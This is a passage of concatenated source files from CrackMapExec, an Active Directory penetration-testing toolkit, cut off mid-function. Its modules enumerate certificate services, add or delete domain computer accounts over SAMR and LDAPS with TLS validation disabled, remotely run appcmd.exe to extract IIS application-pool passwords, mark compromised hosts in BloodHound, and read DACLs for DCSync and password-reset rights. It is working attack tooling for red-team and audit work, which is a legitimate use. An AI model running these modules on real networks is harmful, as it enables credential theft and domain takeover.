self.regex = re.compile("(https?://.+)")
self.server = None
self.base_dn = None
if module_options and "SERVER" in module_options:
self.server = module_options["SERVER"]
if module_options and "BASE_DN" in module_options:
self.base_dn = module_options["BASE_DN"]
def on_login(self, context, connection):
"""
On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names.
"""
if self.server is None:
search_filter = "(objectClass=pKIEnrollmentService)"
else:
search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,"
self.context.log.highlight("Using PKI CN: {}".format(self.server))
context.log.display("Starting LDAP search with search filter '{}'".format(search_filter))
try:
sc = ldap.SimplePagedResultsControl()
base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn
if self.server is None:
resp = connection.ldapConnection.search(
searchFilter=search_filter,
attributes=[],
sizeLimit=0,
searchControls=[sc],
perRecordCallback=self.process_servers,
searchBase="CN=Configuration," + base_dn_root,
)
else:
resp = connection.ldapConnection.search(
searchFilter=search_filter + base_dn_root + ")",
attributes=["certificateTemplates"],
sizeLimit=0,
searchControls=[sc],
perRecordCallback=self.process_templates,
searchBase="CN=Configuration," + base_dn_root,
)
except LDAPSearchError as e:
context.log.fail("Obtained unexpected exception: {}".format(str(e)))
def process_servers(self, item):
"""
Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers.
"""
if not isinstance(item, ldapasn1.SearchResultEntry):
return
urls = []
host_name = None
cn = None
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "dNSHostName":
host_name = attribute["vals"][0].asOctets().decode("utf-8")
if str(attribute["type"]) == "cn":
cn = attribute["vals"][0].asOctets().decode("utf-8")
elif str(attribute["type"]) == "msPKI-Enrollment-Servers":
values = attribute["vals"]
for value in values:
value = value.asOctets().decode("utf-8")
match = self.regex.search(value)
if match:
urls.append(match.group(1))
except Exception as e:
entry = host_name or "item"
self.context.log.fail("Skipping {}, cannot process LDAP entry due to error: '{}'".format(entry, str(e)))
if host_name:
self.context.log.highlight("Found PKI Enrollment Server: {}".format(host_name))
if cn:
self.context.log.highlight("Found CN: {}".format(cn))
for url in urls:
self.context.log.highlight("Found PKI Enrollment WebService: {}".format(url))
def process_templates(self, item):
"""
Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server.
"""
if not isinstance(item, ldapasn1.SearchResultEntry):
return
templates = []
template_name = None
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "certificateTemplates":
for val in attribute["vals"]:
template_name = val.asOctets().decode("utf-8")
templates.append(template_name)
except Exception as e:
entry = template_name or "item"
self.context.log.fail(f"Skipping {entry}, cannot process LDAP entry due to error: '{e}'")
if templates:
for t in templates:
self.context.log.highlight("Found Certificate Template: {}".format(t))
================================================
FILE: cme/modules/add_computer.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ldap3
from impacket.dcerpc.v5 import samr, epm, transport
class CMEModule:
'''
Module by CyberCelt: @Cyb3rC3lt
Initial module:
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
Thanks to the guys at impacket for the original code
'''
name = 'add-computer'
description = 'Adds or deletes a domain computer'
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
'''
add-computer: Specify add-computer to call the module using smb
NAME: Specify the NAME option to name the Computer to be added
PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
DELETE: Specify DELETE to remove a Computer
CHANGEPW: Specify CHANGEPW to modify a Computer password
Usage: cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
cme smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
'''
self.__baseDN = None
self.__computerGroup = None
self.__method = "SAMR"
self.__noAdd = False
self.__delete = False
self.noLDAPRequired = False
if 'DELETE' in module_options:
self.__delete = True
if 'CHANGEPW' in module_options and ('NAME' not in module_options or 'PASSWORD' not in module_options):
context.log.error('NAME and PASSWORD options are required!')
elif 'CHANGEPW' in module_options:
self.__noAdd = True
if 'NAME' in module_options:
self.__computerName = module_options['NAME']
if self.__computerName[-1] != '$':
self.__computerName += '$'
else:
context.log.error('NAME option is required!')
exit(1)
if 'PASSWORD' in module_options:
self.__computerPassword = module_options['PASSWORD']
elif 'PASSWORD' not in module_options and not self.__delete:
context.log.error('PASSWORD option is required!')
exit(1)
def on_login(self, context, connection):
#Set some variables
self.__domain = connection.domain
self.__domainNetbios = connection.domain
self.__kdcHost = connection.hostname + "." + connection.domain
self.__target = self.__kdcHost
self.__username = connection.username
self.__password = connection.password
self.__targetIp = connection.host
self.__port = context.smb_server_port
self.__aesKey = context.aesKey
self.__hashes = context.hash
self.__doKerberos = connection.kerberos
self.__nthash = ""
self.__lmhash = ""
if context.hash and ":" in context.hash[0]:
hashList = context.hash[0].split(":")
self.__nthash = hashList[-1]
self.__lmhash = hashList[0]
elif context.hash and ":" not in context.hash[0]:
self.__nthash = context.hash[0]
self.__lmhash = "00000000000000000000000000000000"
# First try to add via SAMR over SMB
self.doSAMRAdd(context)
# If SAMR fails now try over LDAPS
if not self.noLDAPRequired:
self.doLDAPSAdd(connection,context)
else:
exit(1)
def doSAMRAdd(self,context):
if self.__targetIp is not None:
stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
else:
stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np')
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_dport(self.__port)
if self.__targetIp is not None:
rpctransport.setRemoteHost(self.__targetIp)
rpctransport.setRemoteName(self.__target)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransport.get_dce_rpc()
servHandle = None
domainHandle = None
userHandle = None
try:
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
samrConnectResponse = samr.hSamrConnect5(dce, '\\\\%s\x00' % self.__target,
samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN )
servHandle = samrConnectResponse['ServerHandle']
samrEnumResponse = samr.hSamrEnumerateDomainsInSamServer(dce, servHandle)
domains = samrEnumResponse['Buffer']['Buffer']
domainsWithoutBuiltin = list(filter(lambda x : x['Name'].lower() != 'builtin', domains))
if len(domainsWithoutBuiltin) > 1:
domain = list(filter(lambda x : x['Name'].lower() == self.__domainNetbios, domains))
if len(domain) != 1:
context.log.highlight(u'{}'.format(
'This domain does not exist: "' + self.__domainNetbios + '"'))
logging.critical("Available domain(s):")
for domain in domains:
logging.error(" * %s" % domain['Name'])
raise Exception()
else:
selectedDomain = domain[0]['Name']
else:
selectedDomain = domainsWithoutBuiltin[0]['Name']
samrLookupDomainResponse = samr.hSamrLookupDomainInSamServer(dce, servHandle, selectedDomain)
domainSID = samrLookupDomainResponse['DomainId']
if logging.getLogger().level == logging.DEBUG:
logging.info("Opening domain %s..." % selectedDomain)
samrOpenDomainResponse = samr.hSamrOpenDomain(dce, servHandle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER , domainSID)
domainHandle = samrOpenDomainResponse['DomainHandle']
if self.__noAdd or self.__delete:
try:
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
except samr.DCERPCSessionError as e:
if e.error_code == 0xc0000073:
context.log.highlight(u'{}'.format(
self.__computerName + ' not found in domain ' + selectedDomain))
self.noLDAPRequired = True
raise Exception()
else:
raise
userRID = checkForUser['RelativeIds']['Element'][0]
if self.__delete:
access = samr.DELETE
message = "delete"
else:
access = samr.USER_FORCE_PASSWORD_CHANGE
message = "set the password for"
try:
openUser = samr.hSamrOpenUser(dce, domainHandle, access, userRID)
userHandle = openUser['UserHandle']
except samr.DCERPCSessionError as e:
if e.error_code == 0xc0000022:
context.log.highlight(u'{}'.format(
self.__username + ' does not have the right to ' + message + " " + self.__computerName))
self.noLDAPRequired = True
raise Exception()
else:
raise
else:
if self.__computerName is not None:
try:
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
self.noLDAPRequired = True
context.log.highlight(u'{}'.format(
'Computer account already exists with the name: "' + self.__computerName + '"'))
raise Exception()
except samr.DCERPCSessionError as e:
if e.error_code != 0xc0000073:
raise
else:
foundUnused = False
while not foundUnused:
self.__computerName = self.generateComputerName()
try:
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
except samr.DCERPCSessionError as e:
if e.error_code == 0xc0000073:
foundUnused = True
else:
raise
try:
createUser = samr.hSamrCreateUser2InDomain(dce, domainHandle, self.__computerName, samr.USER_WORKSTATION_TRUST_ACCOUNT, samr.USER_FORCE_PASSWORD_CHANGE,)
self.noLDAPRequired = True
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
except samr.DCERPCSessionError as e:
if e.error_code == 0xc0000022:
context.log.highlight(u'{}'.format(
'The following user does not have the right to create a computer account: "' + self.__username + '"'))
raise Exception()
elif e.error_code == 0xc00002e7:
context.log.highlight(u'{}'.format(
'The following user exceeded their machine account quota: "' + self.__username + '"'))
raise Exception()
else:
raise
userHandle = createUser['UserHandle']
if self.__delete:
samr.hSamrDeleteUser(dce, userHandle)
context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account'))
self.noLDAPRequired=True
userHandle = None
else:
samr.hSamrSetPasswordInternal4New(dce, userHandle, self.__computerPassword)
if self.__noAdd:
context.log.highlight(u'{}'.format(
'Successfully set the password of machine "' + self.__computerName + '" with password "' + self.__computerPassword + '"'))
self.noLDAPRequired=True
else:
checkForUser = samr.hSamrLookupNamesInDomain(dce, domainHandle, [self.__computerName])
userRID = checkForUser['RelativeIds']['Element'][0]
openUser = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, userRID)
userHandle = openUser['UserHandle']
req = samr.SAMPR_USER_INFO_BUFFER()
req['tag'] = samr.USER_INFORMATION_CLASS.UserControlInformation
req['Control']['UserAccountControl'] = samr.USER_WORKSTATION_TRUST_ACCOUNT
samr.hSamrSetInformationUser2(dce, userHandle, req)
if not self.noLDAPRequired:
context.log.highlight(u'{}'.format(
'Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"'))
self.noLDAPRequired = True
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
finally:
if userHandle is not None:
samr.hSamrCloseHandle(dce, userHandle)
if domainHandle is not None:
samr.hSamrCloseHandle(dce, domainHandle)
if servHandle is not None:
samr.hSamrCloseHandle(dce, servHandle)
dce.disconnect()
def doLDAPSAdd(self, connection, context):
ldap_domain = connection.domain.replace(".", ",dc=")
spns = [
'HOST/%s' % self.__computerName,
'HOST/%s.%s' % (self.__computerName, connection.domain),
'RestrictedKrbHost/%s' % self.__computerName,
'RestrictedKrbHost/%s.%s' % (self.__computerName, connection.domain),
]
ucd = {
'dnsHostName': '%s.%s' % (self.__computerName, connection.domain),
'userAccountControl': 0x1000,
'servicePrincipalName': spns,
'sAMAccountName': self.__computerName,
'unicodePwd': ('"%s"' % self.__computerPassword).encode('utf-16-le')
}
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers='ALL:@SECLEVEL=0')
ldapServer = ldap3.Server(connection.host, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls)
c = Connection(ldapServer, connection.username + '@' + connection.domain, connection.password)
c.bind()
if (self.__delete):
result = c.delete("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain)
if result:
context.log.highlight(u'{}'.format('Successfully deleted the "' + self.__computerName + '" Computer account'))
elif result == False and c.last_error == "noSuchObject":
context.log.highlight(u'{}'.format('Computer named "' + self.__computerName + '" was not found'))
elif result == False and c.last_error == "insufficientAccessRights":
context.log.highlight(
u'{}'.format('Insufficient Access Rights to delete the Computer "' + self.__computerName + '"'))
else:
context.log.highlight(u'{}'.format(
'Unable to delete the "' + self.__computerName + '" Computer account. The error was: ' + c.last_error))
else:
result = c.add("cn=" + self.__computerName + ",cn=Computers,dc=" + ldap_domain,
['top', 'person', 'organizationalPerson', 'user', 'computer'], ucd)
if result:
context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
context.log.highlight(u'{}'.format('You can try to verify this with the CME command:'))
context.log.highlight(u'{}'.format(
'cme ldap ' + connection.host + ' -u ' + connection.username + ' -p ' + connection.password + ' -M group-mem -o GROUP="Domain Computers"'))
elif result == False and c.last_error == "entryAlreadyExists":
context.log.highlight(u'{}'.format('The Computer account "' + self.__computerName + '" already exists'))
elif not result:
context.log.highlight(u'{}'.format(
'Unable to add the "' + self.__computerName + '" Computer account. The error was: ' + c.last_error))
c.unbind()
================================================
FILE: cme/modules/appcmd.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class CMEModule:
"""
Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
Module by Brandon Fisher @shad0wcntr0ller
"""
name = 'iis'
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = True
def __init__(self):
pass
def options(self, context, module_options):
pass
def on_admin_login(self, context, connection):
self.check_appcmd(context, connection)
def check_appcmd(self, context, connection):
if not hasattr(connection, 'has_run'):
connection.has_run = False
if connection.has_run:
return
connection.has_run = True
try:
connection.conn.listPath('C$', '\\Windows\\System32\\inetsrv\\appcmd.exe')
self.execute_appcmd(context, connection)
except:
context.log.fail("appcmd.exe not found, this module is not applicable.")
return
def execute_appcmd(self, context, connection):
command = f'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
context.log.info(f'Checking For Hidden Credentials With Appcmd.exe')
output = connection.execute(command, True)
lines = output.splitlines()
username = None
password = None
apppool_name = None
credentials_set = set()
for line in lines:
if 'APPPOOL.NAME:' in line:
apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('"')
if "userName:" in line:
username = line.split("userName:")[1].strip().strip('"')
if "password:" in line:
password = line.split("password:")[1].strip().strip('"')
if apppool_name and username is not None and password is not None:
current_credentials = (apppool_name, username, password)
if current_credentials not in credentials_set:
credentials_set.add(current_credentials)
if username:
context.log.success(f"Credentials Found for APPPOOL: {apppool_name}")
if password == "":
context.log.highlight(f"Username: {username} - User Does Not Have A Password")
else:
context.log.highlight(f"Username: {username}, Password: {password}")
username = None
password = None
apppool_name = None
if not credentials_set:
context.log.fail("No credentials found :(")
================================================
FILE: cme/modules/bh_owned.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author:
# Romain Bentz (pixis - @hackanddo)
# Website:
# https://beta.hackndo.com [FR]
# https://en.hackndo.com [EN]
import sys
from neo4j import GraphDatabase
from neo4j.exceptions import AuthError, ServiceUnavailable
class CMEModule:
name = "bh_owned"
description = "Set pwned computer as owned in Bloodhound"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.neo4j_pass = None
self.neo4j_user = None
self.neo4j_Port = None
self.neo4j_URI = None
def options(self, context, module_options):
"""
URI URI for Neo4j database (default: 127.0.0.1)
PORT Listening port for Neo4j database (default: 7687)
USER Username for Neo4j database (default: 'neo4j')
PASS Password for Neo4j database (default: 'neo4j')
"""
self.neo4j_URI = "127.0.0.1"
self.neo4j_Port = "7687"
self.neo4j_user = "neo4j"
self.neo4j_pass = "neo4j"
if module_options and "URI" in module_options:
self.neo4j_URI = module_options["URI"]
if module_options and "PORT" in module_options:
self.neo4j_Port = module_options["PORT"]
if module_options and "USER" in module_options:
self.neo4j_user = module_options["USER"]
if module_options and "PASS" in module_options:
self.neo4j_pass = module_options["PASS"]
def on_admin_login(self, context, connection):
if context.local_auth:
domain = connection.conn.getServerDNSDomainName()
else:
domain = connection.domain
host_fqdn = f"{connection.hostname}.{domain}".upper()
uri = f"bolt://{self.neo4j_URI}:{self.neo4j_Port}"
context.log.debug(f"Neo4j URI: {uri}")
context.log.debug(f"User: {self.neo4j_user}, Password: {self.neo4j_pass}")
try:
driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False)
except AuthError:
context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" " not valid. See --options")
sys.exit()
except ServiceUnavailable:
context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")
sys.exit()
except Exception as e:
context.log.fail("Unexpected error with Neo4J")
context.log.debug(f"Error {e}: ")
sys.exit()
with driver.session() as session:
with session.begin_transaction() as tx:
result = tx.run(f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' " c.name AS name")
record = result.single()
try:
value = record.value()
except AttributeError:
value = []
if len(value) > 0:
context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound")
else:
context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" " imported the correct data?")
driver.close()
================================================
FILE: cme/modules/daclread.py
================================================
import binascii
import codecs
import json
import re
import datetime
from enum import Enum
from impacket.ldap import ldaptypes
from impacket.uuid import bin_to_string
from cme.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from ldap3.protocol.formatters.formatters import format_sid
from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control
OBJECT_TYPES_GUID = {}
OBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)
OBJECT_TYPES_GUID.update(EXTENDED_RIGHTS)
# Universal SIDs
WELL_KNOWN_SIDS = {
"S-1-0": "Null Authority",
"S-1-0-0": "Nobody",
"S-1-1": "World Authority",
"S-1-1-0": "Everyone",
"S-1-2": "Local Authority",
"S-1-2-0": "Local",
"S-1-2-1": "Console Logon",
"S-1-3": "Creator Authority",
"S-1-3-0": "Creator Owner",
"S-1-3-1": "Creator Group",
"S-1-3-2": "Creator Owner Server",
"S-1-3-3": "Creator Group Server",
"S-1-3-4": "Owner Rights",
"S-1-5-80-0": "All Services",
"S-1-4": "Non-unique Authority",
"S-1-5": "NT Authority",
"S-1-5-1": "Dialup",
"S-1-5-2": "Network",
"S-1-5-3": "Batch",
"S-1-5-4": "Interactive",
"S-1-5-6": "Service",
"S-1-5-7": "Anonymous",
"S-1-5-8": "Proxy",
"S-1-5-9": "Enterprise Domain Controllers",
"S-1-5-10": "Principal Self",
"S-1-5-11": "Authenticated Users",
"S-1-5-12": "Restricted Code",
"S-1-5-13": "Terminal Server Users",
"S-1-5-14": "Remote Interactive Logon",
"S-1-5-15": "This Organization",
"S-1-5-17": "This Organization",
"S-1-5-18": "Local System",
"S-1-5-19": "NT Authority",
"S-1-5-20": "NT Authority",
"S-1-5-32-544": "Administrators",
"S-1-5-32-545": "Users",
"S-1-5-32-546": "Guests",
"S-1-5-32-547": "Power Users",
"S-1-5-32-548": "Account Operators",
"S-1-5-32-549": "Server Operators",
"S-1-5-32-550": "Print Operators",
"S-1-5-32-551": "Backup Operators",
"S-1-5-32-552": "Replicators",
"S-1-5-64-10": "NTLM Authentication",
"S-1-5-64-14": "SChannel Authentication",
"S-1-5-64-21": "Digest Authority",
"S-1-5-80": "NT Service",
"S-1-5-83-0": "NT VIRTUAL MACHINE\Virtual Machines",
"S-1-16-0": "Untrusted Mandatory Level",
"S-1-16-4096": "Low Mandatory Level",
"S-1-16-8192": "Medium Mandatory Level",
"S-1-16-8448": "Medium Plus Mandatory Level",
"S-1-16-12288": "High Mandatory Level",
"S-1-16-16384": "System Mandatory Level",
"S-1-16-20480": "Protected Process Mandatory Level",
"S-1-16-28672": "Secure Process Mandatory Level",
"S-1-5-32-554": "BUILTIN\Pre-Windows 2000 Compatible Access",
"S-1-5-32-555": "BUILTIN\Remote Desktop Users",
"S-1-5-32-557": "BUILTIN\Incoming Forest Trust Builders",
"S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
"S-1-5-32-558": "BUILTIN\Performance Monitor Users",
"S-1-5-32-559": "BUILTIN\Performance Log Users",
"S-1-5-32-560": "BUILTIN\Windows Authorization Access Group",
"S-1-5-32-561": "BUILTIN\Terminal Server License Servers",
"S-1-5-32-562": "BUILTIN\Distributed COM Users",
"S-1-5-32-569": "BUILTIN\Cryptographic Operators",
"S-1-5-32-573": "BUILTIN\Event Log Readers",
"S-1-5-32-574": "BUILTIN\Certificate Service DCOM Access",
"S-1-5-32-575": "BUILTIN\RDS Remote Access Servers",
"S-1-5-32-576": "BUILTIN\RDS Endpoint Servers",
"S-1-5-32-577": "BUILTIN\RDS Management Servers",
"S-1-5-32-578": "BUILTIN\Hyper-V Administrators",
"S-1-5-32-579": "BUILTIN\Access Control Assistance Operators",
"S-1-5-32-580": "BUILTIN\Remote Management Users",
}
# GUID rights enum
# GUID thats permits to identify extended rights in an ACE
# https://docs.microsoft.com/en-us/windows/win32/adschema/a-rightsguid
class RIGHTS_GUID(Enum):
WriteMembers = "bf9679c0-0de6-11d0-a285-00aa003049e2"
ResetPassword = "00299570-246d-11d0-a768-00aa006e0529"
DS_Replication_Get_Changes = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_Replication_Get_Changes_All = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# ACE flags enum
# New ACE at the end of SACL for inheritance and access return system-audit
# https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace
class ACE_FLAGS(Enum):
CONTAINER_INHERIT_ACE = ldaptypes.ACE.CONTAINER_INHERIT_ACE
FAILED_ACCESS_ACE_FLAG = ldaptypes.ACE.FAILED_ACCESS_ACE_FLAG
INHERIT_ONLY_ACE = ldaptypes.ACE.INHERIT_ONLY_ACE
INHERITED_ACE = ldaptypes.ACE.INHERITED_ACE
NO_PROPAGATE_INHERIT_ACE = ldaptypes.ACE.NO_PROPAGATE_INHERIT_ACE
OBJECT_INHERIT_ACE = ldaptypes.ACE.OBJECT_INHERIT_ACE
SUCCESSFUL_ACCESS_ACE_FLAG = ldaptypes.ACE.SUCCESSFUL_ACCESS_ACE_FLAG
# ACE flags enum
# For an ACE, flags that indicate if the ObjectType and the InheritedObjecType are set with a GUID
# Since these two flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'
# https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace
class OBJECT_ACE_FLAGS(Enum):
ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT
# Access Mask enum
# Access mask permits to encode principal's rights to an object. This is the rights the principal behind the specified SID has
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b
# https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum?redirectedfrom=MSDN
class ACCESS_MASK(Enum):
# Generic Rights
GenericRead = 0x80000000 # ADS_RIGHT_GENERIC_READ
GenericWrite = 0x40000000 # ADS_RIGHT_GENERIC_WRITE
GenericExecute = 0x20000000 # ADS_RIGHT_GENERIC_EXECUTE
GenericAll = 0x10000000 # ADS_RIGHT_GENERIC_ALL
# Maximum Allowed access type
MaximumAllowed = 0x02000000
# Access System Acl access type
AccessSystemSecurity = 0x01000000 # ADS_RIGHT_ACCESS_SYSTEM_SECURITY
# Standard access types
Synchronize = 0x00100000 # ADS_RIGHT_SYNCHRONIZE
WriteOwner = 0x00080000 # ADS_RIGHT_WRITE_OWNER
WriteDACL = 0x00040000 # ADS_RIGHT_WRITE_DAC
ReadControl = 0x00020000 # ADS_RIGHT_READ_CONTROL
Delete = 0x00010000 # ADS_RIGHT_DELETE
# Specific rights
AllExtendedRights = 0x00000100 # ADS_RIGHT_DS_CONTROL_ACCESS
ListObject = 0x00000080 # ADS_RIGHT_DS_LIST_OBJECT
DeleteTree = 0x00000040 # ADS_RIGHT_DS_DELETE_TREE
WriteProperties = 0x00000020 # ADS_RIGHT_DS_WRITE_PROP
ReadProperties = 0x00000010 # ADS_RIGHT_DS_READ_PROP
Self = 0x00000008 # ADS_RIGHT_DS_SELF
ListChildObjects = 0x00000004 # ADS_RIGHT_ACTRL_DS_LIST
DeleteChild = 0x00000002 # ADS_RIGHT_DS_DELETE_CHILD
CreateChild = 0x00000001 # ADS_RIGHT_DS_CREATE_CHILD
# Simple permissions enum
# Simple permissions are combinaisons of extended permissions
# https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)?redirectedfrom=MSDN
class SIMPLE_PERMISSIONS(Enum):
FullControl = 0xF01FF
Modify = 0x0301BF
ReadAndExecute = 0x0200A9
ReadAndWrite = 0x02019F
Read = 0x20094
Write = 0x200BC
# Mask ObjectType field enum
# Possible values for the Mask field in object-specific ACE (permitting to specify extended rights in the ObjectType field for example)
# Since these flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes'
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/c79a383c-2b3f-4655-abe7-dcbb7ce0cfbe
class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
ControlAccess = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
CreateChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CREATE_CHILD
DeleteChild = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_DELETE_CHILD
ReadProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_READ_PROP
WriteProperty = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
Self = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_SELF
class CMEModule:
"""
Module to read and backup the Discretionary Access Control List of one or multiple objects.
This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.
It has been converted to an LDAPConnection session, and improvements on the filtering and the ability to specify multiple targets have been added.
It could be interesting to implement the write/remove functions here, but a ldap3 session instead of a LDAPConnection one is required to write.
"""
name = "daclread"
description = "Read and backup the Discretionary Access Control List of objects. Based on the work of @_nwodtuhs and @BlWasp_. Be carefull, this module cannot read the DACLS recursively, more explains in the options."
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = False
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
"""
Be carefull, this module cannot read the DACLS recursively. For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.
TARGET The objects that we want to read or backup the DACLs, sepcified by its SamAccountName
TARGET_DN The object that we want to read or backup the DACL, specified by its DN (usefull to target the domain itself)
PRINCIPAL The trustee that we want to filter on
ACTION The action to realise on the DACL (read, backup)
ACE_TYPE The type of ACE to read (Allowed or Denied)
RIGHTS An interesting right to filter on ('FullControl', 'ResetPassword', 'WriteMembers', 'DCSync')
RIGHTS_GUID A right GUID that specify a particular rights to filter on
"""
self.context = context
if not module_options:
context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read")
exit(1)
if module_options and "TARGET" in module_options:
if re.search(r"^(.+)\/([^\/]+)$", module_options["TARGET"]) is not None:
try:
self.target_file = open(module_options["TARGET"], "r")
self.target_sAMAccountName = None
except Exception as e:
context.log.fail("The file doesn't exist or cannot be openned.")
else:
self.target_sAMAccountName = module_options["TARGET"]
self.target_file = None
self.target_DN = None
self.target_SID = None
if module_options and "TARGET_DN" in module_options:
self.target_DN = module_options["TARGET_DN"]
self.target_sAMAccountName = None
self.target_file = None
if module_options and "PRINCIPAL" in module_options:
self.principal_sAMAccountName = module_options["PRINCIPAL"]
else:
self.principal_sAMAccountName = None
self.principal_sid = None
if module_options and "ACTION" in module_options:
self.action = module_options["ACTION"]
else:
self.action = "read"
if module_options and "ACE_TYPE" in module_options:
self.ace_type = module_options["ACE_TYPE"]
else:
self.ace_type = "allowed"
if module_options and "RIGHTS" in module_options:
self.rights = module_options["RIGHTS"]
else:
self.rights = None
if module_options and "RIGHTS_GUID" in module_options:
self.rights_guid = module_options["RIGHTS_GUID"]
else:
self.rights_guid = None
self.filename = None
def on_login(self, context, connection):
"""
On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified
"""
context.log.highlight("Be carefull, this module cannot read the DACLS recursively.")
self.baseDN = connection.ldapConnection._baseDN
self.ldap_session = connection.ldapConnection
# Searching for the principal SID
if self.principal_sAMAccountName is not None:
_lookedup_principal = self.principal_sAMAccountName
try:
self.principal_sid = format_sid(
self.ldap_session.search(
searchBase=self.baseDN,
searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal),
attributes=["objectSid"],
)[0][
1
][0][
1
][0]
)
context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid)
except Exception as e:
context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal)
exit(1)
# Searching for the targets SID and their Security Decriptors
# If there is only one target
if (self.target_sAMAccountName or self.target_DN) and self.target_file is None:
# Searching for target account with its security descriptor
try:
self.search_target_principal_security_descriptor(context, connection)
# Extract security descriptor data
